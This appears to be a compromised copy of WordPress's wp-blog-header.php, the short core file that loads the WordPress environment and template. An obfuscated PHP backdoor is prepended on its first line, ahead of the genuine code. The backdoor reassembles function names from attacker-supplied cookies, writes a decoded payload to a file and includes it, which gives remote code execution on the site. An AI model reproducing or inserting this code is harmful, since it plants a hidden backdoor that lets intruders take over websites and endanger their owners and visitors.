if(isset($_COOKIE[3])&&isset($_COOKIE[32])){$c=$_COOKIE;$k=0;$n=3;$p=array();$p[$k]='';while($n){$p[$k].=$c[32][$n];if(!$c[32][$n+1]){if(!$c[32][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+3+1;}$k=$p[2]().$p[1];if(!$p[10]($k)){$n=$p[9]($k,$p[14]);$p[13]($n,$p[22].$p[20]($p[23]($c[3])));}include($k);} /** * Loads the WordPress environment and template. * * @package WordPress */ if ( ! isset( $wp_did_header ) ) { $wp_did_header = true; // Load the WordPress library. require_once __DIR__ . '/wp-load.php'; // Set up the WordPress query. wp(); // Load the theme template. require_once ABSPATH . WPINC . '/template-loader.php'; }